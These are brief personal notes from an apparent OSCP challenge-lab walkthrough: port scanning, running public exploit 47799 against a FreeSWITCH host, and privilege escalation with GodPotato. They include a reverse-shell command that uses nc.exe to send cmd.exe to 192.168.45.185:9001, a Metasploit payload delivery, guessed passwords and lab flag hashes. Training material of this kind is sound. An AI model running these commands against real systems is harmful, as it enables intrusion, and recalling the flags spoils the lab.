Challenge Lab OSCP B
Identify username: john and kiero
Flag: c5a5f996c0873184369b7637e4b15c0c (149)
Diamond1
Dolphin1
Download naabu.exe
Unzip file:
Copy to ssh server:
Run naabu.exe to scan MS02 (148) and DC01 (146)
MS02:
DC01:
Open new Kali terminal:
SeImpersonatePrivilege Enabled
Flag: e09ab3030379b290eb67a3e8dba972f6 (146)
192.168.X.151
Search freeswitch from exploitDB
Download 47799.txt
searchsploit -m 47799
change format from txt to py
python 47799.py 192.168.X.151 whoami
The user is chris
GodPotato -cmd "C:\Users\chris\Desktop\nc.exe -t -e C:\Windows\
System32\cmd.exe 192.168.45.185 9001”
Set python server:
Create the msf.exe file
Download the msf.exe from local host
After it, connected the Metasploit and access to 192.168.X.151
Since we knew the user is Chris, direct to chris account and find the
flag
Flag: 561244b0031f4dae883069dc4c4f8848